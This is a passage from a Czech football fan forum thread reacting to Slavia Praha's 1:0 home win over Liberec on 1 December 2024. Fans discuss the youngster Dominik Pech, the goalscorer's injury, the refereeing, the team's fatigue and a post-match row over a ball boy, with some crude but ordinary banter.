Zatím hodně rozpačité a Liberec má jedinou střelu na branku, my 0. Re: Slavia - Liberec slavista23 před 8 dny 01.12.2024 13:41 | 3 1 My máme taky jednu střelu na branku. Jen jim dlouho trvá než ji tam napíšou. A už je tam! Hra Hlavis před 8 dny 01.12.2024 13:33 | 3 4 My jsme prostě mistři jak zase něco zbabrat katastrofa Re: Slavia - Liberec Steevee před 8 dny 01.12.2024 13:36 | 9 2 Teď ten Ivan, to je přesně Slavia z pohárů. Neříkám, že to je penalta nebo že šel sám, ale kamkoliv jinam než do gólmana to je jistej gól. Jenže prostě Schranz to trefí tak, že kdyby chtěl trefit přímo střed postavy brankáře na milimetr, tak to tak netrefí... Re: Slavia - Liberec zeleznik2 před 8 dny 01.12.2024 13:42 | 1 0 Tak během 10 minut, počet střel zvýšil na 9:3 a už máme i jednu na bránu. Re: Slavia - Liberec zeleznik2 před 8 dny 01.12.2024 13:43 | 1 0 p!erreCORE před 8 dny 01.12.2024 13:43 | 14 0 Marty2 před 8 dny 01.12.2024 13:44 | 2 0 Marty2 před 8 dny 01.12.2024 13:46 | 6 0 Ten kluk je neuvěřitelnej, správně drzej:) Re: Slavia - Liberec mig52 před 8 dny 01.12.2024 14:01 | 1 1 Nj., a k tomu fotbalový!!! Re: Slavia - Liberec Marty2 před 8 dny 01.12.2024 13:43 | 9 0 zeleznik2 před 8 dny 01.12.2024 13:44 | 5 0 ervin před 8 dny 01.12.2024 13:48 | 12 0 Pedro50 před 8 dny 01.12.2024 13:52 | 2 1 sirvasik před 8 dny 01.12.2024 13:53 | 3 0 donford před 8 dny 01.12.2024 14:08 | 4 0 Rozhodčí to dost pouští, ale zároveň drží na uzdě. Jen se i nelíbilo, jak pustil, když zmastili Zafeirise před jejich vápnem. A nic. Za mnohem menší faul pak dostal Doudis žlutou. Hodně se mi zatím líbí Pech, velmi jistý Holeš a již zmiňovaný dříč Zafeiris. Ona se vůbec i po Fenerbahce celá záloha snaží a maká. Re: Slavia - Liberec zeleznik2 před 8 dny 01.12.2024 13:52 | 15 1 Dominik Pech jednoznačně nejlepším slávistou dnes.. Re: Slavia - Liberec mig52 před 8 dny 01.12.2024 14:00 | 1 2 Jasan, v rodině změna programu, měl jsem možnost shlédnout druhou část poločasu. Ogárka Pechovic je nutno zabudovat do kádru. A měli bychom to jako super přestup zdarma. Chce to jen mít koule. Komentář byl uživatelem upraven (01.12.2024 14:00) . Zobrazit původní komentář Původní komentář: Jasan, v rodině změna programu, měl hsem možnost shlédnout druhou část poločasu. Ogárka Pechovic je nutno zabudovat do kádru. A měli bychom to jako super přestup zdarma. Chce to jen mít koule.. carevitchando před 8 dny 01.12.2024 13:55 | 7 0 Po rozpačitém začátku, kdy zřejmě ještě neslehl nedělní oběd, přišla dominance a zasloužené vedení. Jen tak dál! Re: Slavia - Liberec Marty2 před 8 dny 01.12.2024 14:03 | 1 1 Tak ono chvilku trvá rozběhat únavu, druhá půle už bude fyzicky lepší. Re: Slavia - Liberec zeleznik2 před 8 dny 01.12.2024 13:55 | 1 0 Už to vypadá lépe, ale ještě nás čeká nejméně 45 šichty.. 11 Střely 4 3 Střely na branku 2 69 % Držení míče 31 % 278 Přihrávky 137 82 % Přesnost přihrávek 67 % 4 Fauly 8 1 Žluté karty 1 0 Červené karty 0 1 Ofsajdy 1 3 Rohy 0 Tak hezky co nejdříve potvrdit a Slávista 51 před 8 dny 01.12.2024 13:57 | 1 1 potom dorazit, ať vidí, že Slavia ten fotbal umí! Re: Slavia - Liberec velehal před 8 dny 01.12.2024 13:58 | 1 0 Po vlažnějším začátku je tohle zatím dobrý výsledek. Ještě zlepšit předfinální fázi a snad přidáme ještě jeden, nejlépe dva. Re: Slavia - Liberec yuta_watase01 před 8 dny 01.12.2024 13:59 | 9 2 Tvl chlapi kliid, hrajeme tak na 50 procent toho co umíme, v nohách těžký zápas s Turkama, s minimem změn v sestavě, v brutální zimě a stejně celkem v pohodě vedeme ))) Máme silnou lavičku, Matěj s Provym je pak dorazí, za mě uplně pohodový zápas a jasný 3 body, nic víc bych neřešil ))) Hlavní je výhra, důležitější bude zápas v Ostravě , pokud ten zvládneme, tak k titulu budeme už opravdu velmi blízko ))) Jen je mi líto zranění Chytila, sice nemá zdaleka takový přínos pro hru jako Choras a nehraje v TOP formě jako loni, ale zase dává branky, snad to nebude nic vážného, rád bych viděl Dana Filu dneska a Chorase nechal odpočívat... Pech velice slušně, jeho vedení míče a pohyb s míčem je vysoce nadstandartní! Re: Slavia - Liberec pipe1980 před 8 dny 01.12.2024 14:03 | 4 3 Ten Pech je skvelej. 18 let, třetí start v lize, poprvé v základu. Re: Slavia - Liberec Miklos před 8 dny 01.12.2024 14:07 | 8 0 Jasně Pech skvělej. Taky jsem si ho přál dnes v základu, ale tenhle gol jde za Mojmou. Skvělej čich v malém vápně.. Komentář byl uživatelem upraven (01.12.2024 14:10) . Zobrazit původní komentář Jasně Pech akvělej. Taky jsem si ho přál dnes v základu, ale tenhle gol jde za Mojmou. Skvělej čich v malém vápně... p!erreCORE před 8 dny 01.12.2024 14:15 | 3 13 Teď nám odpustil jasnou červenou. Re: Slavia - Liberec Steevee před 8 dny 01.12.2024 14:25 | 13 0 Pech čerstvých 18 let, pěkný, pěkný. Velký příslib. Snad dostane prostor. Re: Slavia - Liberec Miklos před 8 dny 01.12.2024 14:40 | 1 0 cheero před 8 dny 01.12.2024 14:42 | 3 0 No moje pumpa jede na plnej výkon. Re: Slavia - Liberec butters před 8 dny 01.12.2024 14:43 | 11 0 Došla nám šťáva, snad to nějak doklepeme do pauzy bez větších ztrát a dobijeme baterky na jaro, které začíná v lednu. Re: Slavia - Liberec Marty2 před 8 dny 01.12.2024 14:54 | 6 0 Asi jsem si nikdy nepřál zimní pauzu jako teď:) Re: Slavia - Liberec smichov_2 před 8 dny 01.12.2024 14:43 | 6 10 To co my hrajeme před brankou soupeře je jedna velká tragedie. Re: Slavia - Liberec p!erreCORE před 8 dny 01.12.2024 14:59 | 6 0 No že by to bylo pokoukáníčko, tak to nebylo.. ale na to se tabulka neptá!:) Re: Slavia - Liberec ehad před 8 dny 01.12.2024 14:59 | 7 1 Za me dobry, vyhra za 3 body. Pohoda. Re: Slavia - Liberec mig52 před 8 dny 01.12.2024 15:02 | 4 1 Super, bomba, skvělė. A klidně ať někdo kritizuje. Re: Slavia - Liberec WarszawskiMuranow před 8 dny 01.12.2024 15:07 | 7 2 Chtěl bych být takový optimista. Pohoda to rozhodně nebyla, ale díky moc chlapci Komentář byl uživatelem upraven (01.12.2024 15:07) . Zobrazit původní komentář Původní komentář: Miklos před 8 dny 01.12.2024 14:59 | 4 0 ervin před 8 dny 01.12.2024 15:01 | 7 0 Zaslouženě, tvrdě odpracovane. Škoda šancí ale jednou to protrhneme. Re: Slavia - Liberec martynko před 8 dny 01.12.2024 17:50 | 1 0 Steevee před 8 dny 01.12.2024 15:01 | 29 1 Není důvod naříkat, nedejbože nadávat. Tohle jsou zápasy, které nakonec vyhrávají tituly. Kdy to skřípe, neproměníš šance, ale urveš to za tři body. Jsme o další kolo blíž titulu. To jediné se počítá, to jediné je dneska důležité. Re: Slavia - Liberec cheero před 8 dny 01.12.2024 15:03 | 12 0 Uffff. Díky, že za tři body. Ale zdá se mi, že nám postupně dochází síly. Baník bude hodně těžkej při našem rozpoložení. Re: Slavia - Liberec 1:0 JohnyBeGOOD před 8 dny 01.12.2024 15:03 | 10 0 Hodně důležité a vydřené 3 body. Super týmový výkon a opět je třeba ocenit skvělou obranu, která soupeře skoro do ničeho nepustila. Největší riziko byli paradoxně některé hraniční situace ve vápně, ale naštěstí měl rozhodčí dneska dost volný metr a pouštěl to na obě strany. Re: Slavia - Liberec 1:0 mirda před 8 dny 01.12.2024 15:08 | 1 4 To jsi asi neviděl prvních pár minut. Re: Slavia - Liberec zeleznik2 před 8 dny 01.12.2024 15:04 | 10 0 Tak cíl splněn, doufám, že Mojmír bude v pořádku, krom úvodu, Liberec prakticky nic neměl, možná jeden průnik v druhém poločase. Nebyl to úplně krásný zápas, ale druhá vychytaná nula za sebou v lize a tři body. Náskok na Plzeň 11, 14 na Baník a na ty další 16 bodů!!! Takže spokojenost. Re: Slavia - Liberec smichov_2 před 8 dny 01.12.2024 15:05 | 4 9 Např. provod když střílel do břevna tam měl úplně volného Juráska v náběhu. Centry bída, střely ze střední vzdálenosti bída, až na to břevno a jednu od Bořila, nakonec jsme rádi za tu genialitu Pecha, jinak to smrdělo průserem. Vzadu to ovšem bylo za 1. Re: Slavia - Liberec zeleznik2 před 8 dny 01.12.2024 15:07 | 3 1 No spíše 1- za ten úvod. Ale jinak souhlas. Re: Slavia - Liberec Eskaes před 8 dny 01.12.2024 15:50 | 2 0 byl by to nádherný gól a kdoví, jak by to s Kováčovcema potom dopadlo. Re: Slavia - Liberec rakusan před 8 dny 01.12.2024 16:50 | 5 1 Přesně tak, hrajeme úplný hovno celej podzim a Trpiš je zralej na odvolání. Tak snad už teď v zimě, protože vést pouze o 16 bodů nad realem madrid střední evropy je fakt málo! Re: Slavia - Liberec 1:0 carevitchando před 8 dny 01.12.2024 15:05 | 16 0 Tohle cením, strašně ubojované vítězství. V této fázi sezóny se už kumuluje únava a na našich robocopech to už taky bylo vidět. Jak už psal Stevee, tyto zápasy vyhrávají tituly. V závěru skvěle takticky podavač míčů:-) Re: Slavia - Liberec 1:0 SLAVIESTA před 8 dny 01.12.2024 15:06 | 2 40 Střídat střelce gólu, oblíbená disciplína našeho trenéra. Re: Slavia - Liberec 1:0 Slávista 51 před 8 dny 01.12.2024 15:19 | 3 3 Sherudan před 8 dny 01.12.2024 15:26 | 16 0 To ho tam jako měl nechat kulhat ještě do 60. minuty? Re: Slavia - Liberec 1:0 Edenjejenjeden před 8 dny 01.12.2024 15:30 | 17 0 A ráčil sis všimnout, že byl Mojma zraněnej? Vždyt poločas sotva dohrál, a nemohl se ani pořádně rozběhnout Re: Slavia - Liberec 1:0 SLAVIESTA před 8 dny 01.12.2024 17:57 | 1 3 Tak se omlouvám, zápas jsem neviděl. Vycházel jsem tentokrát (ale špatně)z toho, že i v minulosti byl střelec vystřídán již několikrát, nebo nenastoupil v příštím zápase, ačkoliv mu nic nebylo. Mýliti se je lidské, tak se ještě jednou omlouvám. Dík. Re: Slavia - Liberec 1:0 Edenjejenjeden před 8 dny 01.12.2024 18:01 | 3 0 Jo v poho. Ale nevypadal teda vůbec dobře, viditelně kulhal, v závěru poločasu si dokonce sedl na trávník, já si upřímně myslel, že ho Trpiš vystřídá ještě před poločasem. Tak ted hlavně, aby byl Mojma v pořádku Komentář byl uživatelem upraven (01.12.2024 18:02) . Zobrazit původní komentář Původní komentář: Jo v poho. Ale nevypadal teda vůbec dobře, viditelně kulhal, v závěru poločasu si dokonce sedl na trávník, já si upřímně myslel, že ho Trpiš vystřídá hned. Tak ted hlavně, aby byl Mojma v pořádku. jirkag5 před 8 dny 01.12.2024 18:58 | 6 0 Když nevidím a nevím o co jde tak blbě nekomentuji. Re: dnešní statistiky zeleznik2 před 8 dny 01.12.2024 15:06 | 5 1 19 Střely 7 8 Střely na branku 2 67 % Držení míče 33 % 558 Přihrávky 283 83 % Přesnost přihrávek 67 % 9 Fauly 14 3 Žluté karty 2 0 Červené karty 0 1 Ofsajdy 2 6 Rohy 0 Myslím, že i ve čtvrtek jsme měli počet střel na branku a úspěšnost podobnou. Re: Slavia - Liberec mirda před 8 dny 01.12.2024 15:06 | 7 29 Už od zápasu s Duklou hraje Chorý čím dál hůř, naše ofenziva je fakt ubohá, s tímto v Evropě uspět nemůžeme. Ty pokusy Douděry o dobrý centr jsou někdy až směšné. Hlavní jsou tři body, ale teď třikrát venku. Re: Slavia - Liberec Papol před 8 dny 01.12.2024 15:37 | 6 3 Jo, bochánky Douděry do vápna, to je strašné. A stále stejně.... Re: Slavia - Liberec Mesiaš před 8 dny 01.12.2024 15:48 | 3 34 Simulant Chorý je jeden z největších přestupových úletů za poslední dobu. Neskutečný nekopa Re: Slavia - Liberec obiwan před 8 dny 01.12.2024 16:16 | 13 0 Edenjejenjeden před 8 dny 01.12.2024 16:34 | 9 2 Omluv ho Obiwane, je to jen rudej nok. A víš jak mu musí bejt, když se, a vidí propastných 16 bodů ztráty? To s člověkem zamává:-))) Re: Slavia - Liberec obiwan před 8 dny 01.12.2024 17:48 | 5 0 Být rudým nokem je neomluvitelné:-) Re: Slavia - Liberec wotlemburg před 8 dny 01.12.2024 16:33 | 15 0 Mimoň před 8 dny 01.12.2024 15:07 | 22 1 Přidávám se ke chvále...Kluci to naprosto odmakali. Ty unavené pózy a křeč Zafeirise jsou důkazem...jenom kolik míčů jsme získali v posledních 20 minutách na půlce Liberce ...klobouk dolů. Že tam nebude úplně ta lehkost bylo jasné v této části sezóny navíc po střelecké smůle v EL. To na lehkosti nepřidá. Šlo vidět, že kluci třeba dnes málo stříleli, každopádně všechno to maximálně vynahradili obětavostí. Ale co bych tak vypíchl, jak šel Pechův výkon postupně nahoru. Po té jeho asistenci si začal mnohem víc věřit. Líbilo se mi jak hrál. A Chytil je klasický Game changer. Nejde kolikrát tolik vidět, ale pak prostě šikovně tečuje, hraje obětavě...I proto to zranění. Snad bude brzy fit Re: Slavia - Liberec 1:0 Slávista 51 před 8 dny 01.12.2024 15:13 | 0 9 Někdy je tý moc snahy až na škodu, když člověk vidí, jak si tam ve vápně překážejí! TEN DRUHEJ POLOČAS Slávista 51 před 8 dny 01.12.2024 15:11 | 1 10 slavanda před 8 dny 01.12.2024 15:11 | 18 0 Ufff! Odmakaný, klobouček! Tyhle zápasy rozhodují. Re: Slavia - Liberec 1:0 sirvasik před 8 dny 01.12.2024 15:12 | 8 0 Paráda, oslavná štamprle nalita. Důležitý vítězství!!! Za chvíli půjdu na svařák na rozsvícení stromku a pak budu fandit Jabkám. Rýsuje se zajímavá neděle:-) Liberec WarszawskiMuranow před 8 dny 01.12.2024 15:13 | 11 1 Na spartu super náskok ale co fcvp, jako plzenak jsem zatím v klidu,ale evidentně nám dochází šťáva. Příště srat na repre. Dneska velice bojovný zápas. Skvělá obrana a zaloha taky super. Příkladně bojovali, ale ve vápně a kolem něho bohužel opět nekvalita Komentář byl uživatelem upraven (01.12.2024 15:13) . Zobrazit původní komentář Na spartu super náskok ale co fcvp, jako plzenak jsem zatím v klidu,ale evidentně nám dochází šťáva. Příště srat na repre. Dneska velice bojovný zápas. Skvělá obrana a zaloha taky super. Příkladně bojovali, ale ve vápně a kolem něho bohužel opět. Slávista 51 před 8 dny 01.12.2024 15:16 | 3 2 NA BANÍK, SNAD BUDOU PROBUZENÝ! Re: Liberec o5aradecek před 8 dny 01.12.2024 16:27 | 2 0 Hlavně budou o něco odpočatější. Re: Liberec mig52 před 8 dny 01.12.2024 17:07 | 1 3 Tu repre bych bral, ale ono není všechno jen Slavia . Jako v dobrém, jo. Kluci chtějí za repre hrát a ne, že ne, ukáží se světu, narůstá jejich cena. Je to výhodné pro ně i klub. Samozřejmě, únava atd. Ale ta drží pod krkem i Plzeň aj. Prostě fotbal je o Evropě a jestli ji chceš hrát, s únavou a dalšími atributy k tomu patřící musíš počítat. V naší situaci tím, že budeš hrát Pecha!!!!! a pokud přivedeš posilu, tak bezdebat do základu a nejlépe jako klíčového hráče. Nechci být nenažraný, ale doba rozšiřování kádru o další byť talentované náhradníky, je snad za námi. Komentář byl uživatelem upraven (01.12.2024 17:09) . Zobrazit původní komentář Původní komentář: Tu repre bych bral, ale ono není všechno jen Slavia . Jako v dobrém, jo. Kluci chtějí za repre hrát a ne, že ne, ukáží se světu, narůstá jejich cena. Je to výhodné pro ně i klub. Samozřejmě, únava atd. Ale ta drží pod krkem i Plzeň aj. Prostě fotbal je o Evropě a jestli ji chceš hrát, s únavou a dalšími atributy k tomu patřící musíš počítat. V naší situaci tím, že budeš hrát Pecha!!!!! a pokud přivedeš posilu, tak bezdebat do základu a nejlépe jako klíčového hráče. Nechci být nenažraný, ale doba rozšiřování kádru o další byť talentované náhradníky, je za námi.. Slávista 51 před 8 dny 01.12.2024 15:15 | 7 9 Slávista 51 před 8 dny 01.12.2024 15:17 | 2 10 3BODY JSOU DOMA i přes tu bídu a to je hlavní! Re: Rumuni zeleznik2 před 8 dny 01.12.2024 15:19 | 17 1 Takže se dnes řeší žlutá pro Ogbua a neodpískaná penalta na Višinského.. zášť a závist druhého břehu nezná mezí.. Re: Rumuni Pedro50 před 8 dny 01.12.2024 15:24 | 4 2 pipe1980 před 8 dny 01.12.2024 16:09 | 1 4 za co penalta? Respektive čas jestli víš? Re: Rumuni zeleznik2 před 8 dny 01.12.2024 19:57 | 2 0 pipe1980 před 8 dny 01.12.2024 19:59 | 1 2 mig52 před 8 dny 01.12.2024 16:51 | 5 3 Jen ať si z toho serou do trenek. My si podobných situacii užili tolik, že jsme to brali s nakrknutim jako normál. Ať si to užijí, odpadové. Re: Rumuni martynko před 8 dny 01.12.2024 17:53 | 5 2 Ruku na srdce, kdyby Ogbu dostal redku, nikdo by nemohl rict ani popel. A kdovi, jak by potom zapas dopadl. Re: Rumuni Papol před 8 dny 01.12.2024 19:05 | 1 2 pipe1980 před 8 dny 01.12.2024 19:58 | 2 4 Za ty nůžky při kterých kopl soupeře do hlavy Re: Rumuni Ross před 7 dny 01.12.2024 21:43 | 4 2 Ještě nikdy sem neviděl červenou kartu za pokus o nůžky..takže červená ani náhodou. Re: Slavia - Liberec 1:0 Tacit před 8 dny 01.12.2024 15:25 | 21 1 Dnes nejdůležitější výhra podzimu. Díky! I protože jsme naposledy hráli ve čtvrtek, kdežto Liberec celý týden leháro. Re: Slavia - Liberec 1:0 Edenjejenjeden před 8 dny 01.12.2024 15:26 | 29 0 Typickej zápas s Libercem , spousta osobních soubojů, kouskování hry,moc pohlednej zápas to nebyl. Nepamatuji si, kdy by na nás někdo z ligy takhle nastoupil, jako dnes Liberec v úvodu, bylo vidět, že jsou fakt nabuzený, navíc mám pocit, že na některých našich hráčích se začíná přeci jen trochu projevovat únava, proto dnes možná tolik prohranejch osobních soubojů. Ale možná právě proto, že to nebyl úplně náš den, a soupeř naopak vůbec nehrál špatně, tak o to je to dnešní vítězství cennější Jo a moc se mi dnes líbil Dominik Pech Re: Slavia - Liberec 1:0 Ivan před 8 dny 01.12.2024 16:27 | 2 0 Před rokem v Liberci to bylo podobný, jen nám dali 2 góly tehdy:) Re: Slavia - Liberec 1:0 Pedro50 před 8 dny 01.12.2024 15:28 | 8 13 Rozhodl jsem se že herní stránku dneska vůbec hodnotit nebudu, tři body jsou doma a srát na to. Jediný z čeho mám obavu, že to na Baník stačit nebude Re: Slavia - Liberec 1:0 Jonáš před 8 dny 01.12.2024 16:24 | 4 0 To bude úplně jiné utkání. Re: Slavia - Liberec 1:0 Pedro50 před 8 dny 01.12.2024 20:49 | 2 0 Snad jo teď jsme unavení po EL Re: Slavia - Liberec 1:0 mig52 před 8 dny 01.12.2024 16:45 | 3 3 Poslední větou v souvětí jsi svůj názor totálně zabil. Byť beru, že by mohl být pravdivý, momentálně tento názor nesdílím. Re: Slavia - Liberec 1:0 Eskaes před 8 dny 01.12.2024 15:45 | 13 0 Teď už je to hlavně o tom, urvat co nejvíc bodů do zimní přestávky. Obranu máme víc než solidní, tak to teď postavit hlavně na ní. Chceme být v pozici, aby si už ani druhý za náma nedělal realistické naděje, ale spíš se ohlížel za záda. Prostě jít do trháku. No nebyl by to pro jednou příjemný zbytek ligy se sladkou tečkou účasti v LM?:) A kdo nevíte, tipněte si, čí odchovanec je buzkudrnáč Bačkovský. Re: Slavia - Liberec 1:0 martynko před 8 dny 01.12.2024 16:54 | 10 1 Na obraně to máme postavený prakticky už teď. Zafeiris s Oscarem se pohybujou většinou dost nízko. Osobně bych rád viděl jejich větší aktivitu těsně před šestnáctkou soupeře, oni mají z celého týmu nejlepší dribling a minimálně by z toho mohly resultovat nebezpečné přímáky, v posledních xy zápasech jsme neměli defakto žádné. Re: Slavia - Liberec 1:0 Martin Platil před 8 dny 01.12.2024 16:13 | 9 34 Mám podobnou postavu jako Chorý. A bylo by mi trapné, kdybych pomalu z každého souboje vyšel jako ten, kdo leží na zemi. Re: Slavia - Liberec 1:0 mig52 před 8 dny 01.12.2024 16:38 | 17 5 Tož měj pocit trapnosti, gladiátire. Re: Slavia - Liberec 1:0 Mesiaš před 8 dny 01.12.2024 16:53 | 5 37 Chorý je naprosto zbytečný simulant Re: Slavia - Liberec 1:0 Edenjejenjeden před 8 dny 01.12.2024 17:03 | 19 2 Hele a víš, že to stačí napsat jednou sraltane? Re: Slavia - Liberec 1:0 El Greco před 8 dny 01.12.2024 18:34 | 7 1 No, jestli tím ta podobnost s Chorým nekončí... Proč by si měl hráč nechat nakládat - k čemu by mu to bylo? Re: Slavia - Liberec 1:0 hiker42 před 8 dny 01.12.2024 16:56 | 13 0 Zpátky doma na vsi. Zlaté 3 body, Mojma gymnasticky.. Moc se mi líbili dozadu Holeš a Osky, a dopředu Zafi a Pech. Malick naopak strašně moc ztrát, Chorý mi přijde docela z formy.. Je super, že i do tak strašné kosy, jaká byla dnes, máme hráče jako Zmrzlý či Zima. Re: Slavia - Liberec 1:0 martynko před 8 dny 01.12.2024 17:43 | 10 1 Chorase si už soupeři pořádně hledí a to mu očividně vůbec nevoní. Chce to pracovat na dalších variantách pro útočnou fázi:-) Re: Slavia - Liberec 1:0 standa.e před 8 dny 01.12.2024 17:14 | 19 0 Mě dneska hlavně zaujalo, že Kováč naprosto ignoruje techickou zónu a běhá na férovku podél lajny... A nikdo mu nic neřekne. Re: Slavia - Liberec 1:0 Lunaris před 8 dny 01.12.2024 17:14 | 22 0 Fantastické vítězství, kdy hráči dneska jeli na morál. Měl jsem ze zápasu velký respekt, únava se kumuluje, s Libercem je to vždy boj, a rudej Kováč je jistě řádně namotivoval, takže mi spadl velký balvan ze srdce. Díky, kluci. Re: Slavia - Liberec 1:0 rakusan před 8 dny 01.12.2024 17:38 | 12 0 Ano ano, podle mne nejtěžší domácí zápas na podzim letos. Pech výborný, ale Zafi dnes úplně úžasný. Re: Slavia - Liberec 1:0 Hubicka před 8 dny 01.12.2024 17:16 | 10 1 Mně se to líbilo. Motivovaný soupeř. Intenzita, škoda šancí. Obrana nebyla dnes v Topu. Se Zimou mi přijde lepší. Zafi výborný. Pech bude druhý Provod . Ostatní taky nezklamali. 3 body a jedeme dál. Ji. T. zatím potvrzuje kvalitního trenéra. Ta jejich 9 velmi dobrá. Do rotace by se šikla. Re: Slavia - Liberec 1:0 pf před 8 dny 01.12.2024 17:20 | 34 1 Těsná výhra v té kose zahřála, obzvlášť v kontextu včerejších utkání. U Botiče a především na toaLetné můžou teď pukat vzteky a závidět, jak si zkušeně pohlídat v závěru těsný náskok a nepustit soupeře do závěrečného tlaku. Příjemné překvapení byl skvělý výkon Dominika Pecha, do středu zálohy potřebná perspektiva, jen ať naskakuje dál. V závěru musím vyzdvihnout gesto Tomáše Chorého , který došel bránit toho nebohého podavače míčů, kterého tam fénoval fešák Kováč, s ledovým klidem ho odvedl mimo ty běsnící magory, co si chtěli léčit nervy na teenagerovi. Dokonalá ukázka jeho týmového charakteru, o čemž tu mnozí ustavičně pochybují. Re: Slavia - Liberec 1:0 IJS před 8 dny 01.12.2024 17:38 | 11 0 Uff! 3 body jsou doma a náskok na Spartu zase narostl! To je asi nejdůležitější závěr z tohoto kola. Vlastní hra byla taková spíš průměrná, ale chápu okolnosti. Konec těžké sezóny, zápas po 62 hodinách po EL, nutná rotace v základu aj. Nestranně musím přiznat, že rozhodčí nás dnes nepoškodil, spíš naopak. Ten úvod zápasu, to jsem nějak cítil, že tento zápas bude průšvih. Ale asi to byly těžké nohy ze zápasu s Turky. Potom už to byla převaha v poli a pevná obrana. Dnes bych vyzvedl výkony Holeše, Oscara a Zafiho. Oni hrají furt a furt je jejich výkon hodně nadstandardní. Překvapila mě nominace Pecha do základu a rozhodně nezklamal. Opět bylo vidět jak je Slavia nedůrazná a nepřesná v koncovce. Když už někdo trefí balón aby šel na branku, tak je to pumelice do prostředka branky. Takové to řešení - plackou po zemi k tyči, to se nevidí. Teď Slavii čekají 3 zápasy venku a to u odpočatých soupeřů. Nedělám si iluze, že všechno vyhrajeme. Jen se trochu bojím, aby nás případná prohra v Ostravě nesrazila na kolena. Včera jsem se v TV na Baník koukal a je sakra dobrý!! To bude nejtěžší zápas podzimu a nevidím prostor na nějakou rotaci základní sestavy. Re: Slavia - Liberec 1:0 butters před 8 dny 01.12.2024 18:03 | 7 0 Já doufám, že se do zápasu v Ostravě dáme trochu dohromady. Ještě, že je to ve čtvrtek a ne hned ve středu. Ten brzký začátek dnešního zápasu, který nám sebral čas na regeneraci před Libercem , nám teď zase přidá pár hodin k dobru. Myslím, že každá minuta se hodí:-) Na Baník bych určitě poslal to nejlepší, co máme, souhlasím, že to bude nejtěžší zápas podzimu. Nesleduju je, ale mají formu, proti Karviné měli snad 35 střel, trápí je produktivita stejně jako nás, tak snad jim to vydrží další zápas, zatímco my to prolomíme. Dnes jsem se bál o Oscara, hrál s hrozbou 4. žk, naštěstí jí nedostal. Asi by mi nevadilo, kdyby dostal žk v Ostravě a nuceně vynechal zápas v Olomouci , protože tam to beztak budeme muset protočit. Tohle je velká šance pro Pecha, podle mě ze 4 zbývajících zápasů na podzim bude minimálně 2x v základu. Re: Slavia - Liberec 1:0 IJS před 8 dny 01.12.2024 19:14 | 1 0 Kdy se tedy hraje v Ostravě ? Na úvodní straně SN je středa 4.12. od 17,00 hod.? Re: Slavia - Liberec 1:0 butters před 8 dny 01.12.2024 19:58 | 3 0 Hrajeme ve čtvrtek 5.12. od 17:30. Viz oficiální stránky Slavie . Re: Slavia - Liberec 1:0 Qope před 8 dny 01.12.2024 17:40 | 20 1 Než si to zde pročtu, sám za sebe napíšu, že zápas, viděn z tribuny, mě bavil. Jasně, mohlo být více golu a vlastně i šancí, ale když si clovek vezme, co mají hráči v nohách a pak vylezou ještě do takové kosy, tak zaslouží uznání. Tri body jsou, Liberec vlastně ani nic neměl, jo spokojenost. Vubec to za mě nebyla teda nějaka nuda. A ted hlavně aby Chytil byl ok, ještě jsem nezjistoval, jak na tom je. A ještě něco, naši trávníkáři jsou borci. Jak to na začátku vypadalo, že v zimě budeme snad na blátě nebo tak něco, musím říct, že povrch je na tom až neskutečně dobře... PS: nevim jak vypadal treba v TV, ale ten liberečák s číslem 9 na dresu hrál poměrně zajímavý zapas, nebyl vubec špatný... Komentář byl uživatelem upraven (01.12.2024 17:52) . Zobrazit původní komentář Než si to zde pročtu, sám za sebe napíšu, že zápas, viděn z tribuny, mě bavil. Jasně, mohlo být více golu a vlastně i šancí, ale když si clovek vezme, co mají hráči v nohách a pak vylezou ještě do takové kosy, tak zaslouží uznání. Tri body jsou, Liberec vlastně ani nic neměl, jo spokojenost. Vubec to za mě nebyla teda nějaka nuda. A ted hlavně aby Chytil byl ok, ještě jsem nezjistoval, jak na tom je. A ještě něco, naši trávníkáři jsou borci. Jak to na začátku vypadalo, že v zimě budeme snad na blátě nebo tak něco, musím říct, že povrch je na tom až neskutečně dobře.... Miklos před 8 dny 01.12.2024 17:50 | 8 1 Liberec nic neměl? To jsi byl první pětiminutovce ještě ve frontě na pivo ne? Re: Slavia - Liberec 1:0 Qope před 8 dny 01.12.2024 17:51 | 4 1 ok, tak trochu na začátku zlobil, beru... a jinak to byla, za mě, spíše fronta na svařák:-) Re: Slavia - Liberec 1:0 obiwan před 8 dny 01.12.2024 17:52 | 9 0 Máš kliku, žes neviděl prvních pět minut, já měl dvě srdeční zástavy... Re: Slavia - Liberec 1:0 Edenjejenjeden před 8 dny 01.12.2024 18:06 | 2 1 Já to měl uplně stejně a třetí infarkt jsem málem dostal, když jsem na tu situaci podíval zpětně v TV:-))) Re: Slavia - Liberec 1:0 obiwan před 8 dny 01.12.2024 18:10 | 2 1 Na mobilu to moc vidět nebylo...a ta situace Holeš x Višinsky v našem vápně:-( Re: Slavia - Liberec 1:0 mig52 před 8 dny 01.12.2024 19:07 | 3 2 No, to jsem rád, že jsem teprve z přírody chvátal k obrazovce. Možná, že být u ní dřív, tak žena byla vdovou a já se nikdy nedověděl, jako dopadlo s akademií, přístavbou stadionu atd...:-)) Re: Slavia - Liberec 1:0 mig52 před 8 dny 01.12.2024 18:12 | 4 1 Mně se tvůj koment hodně líbí. Těžký zápas v kontrole, Pech skvělý, neškrábu se v tom. Pár chybiček tam bylo, ale aby ne, když se kope 95 minut. Jen tak dál, ogaři. Komentář byl uživatelem upraven (01.12.2024 19:03) . Zobrazit původní komentář Původní komentář: Mně se tvůj koment hodně líbí. Těžký zápas v kontrole, Pech skvělý, neškrábu se v tom. Pár chybiček tam bylo, ale aby ne, když se kole 95 minut. Jen tak dál, ogaři.. Slobo před 8 dny 01.12.2024 17:56 | 51 0 Bez ohledu na výkon Tomáše Chorého mi udělalo velkou radost, když po zápase vzal pod křídla našeho podavače míčů, na kterého ihned po zápase doráželi rudá košťata Kováč a brankář hostí. Chorý je jen v klidu odstrčil a vyprovodil podavače až na půlku hřiště za našima. Re: Slavia - Liberec 1:0 EsoRimmer před 8 dny 01.12.2024 20:24 | 5 1 Me se to gesto podavace take nelibilo, neni to fair play a ja myslim, ze nam to za to nestoji.. Kovac si ma hledet sveho, i kdyz nejake emoce chapu.. Re: Slavia - Liberec 1:0 pf před 8 dny 01.12.2024 21:01 | 9 1 Jednalo se o naprostou klukovinu, kterou nesmyslně zveličili, protože byli frustrovaní z neodvratné porážky. Reálně přišli o kolik? Dvě vteřiny? Kážou něco o fair play, přitom ten jejich Eneme mohl v klídku pod sprchy za to oplácení. K tomu klukovi se slétli jak včelky, až mi to přišlo nedospělé, stačilo mu domluvit. Tahat to ještě na tiskovku je úplně dětinské a zakomplexované. Komentář byl 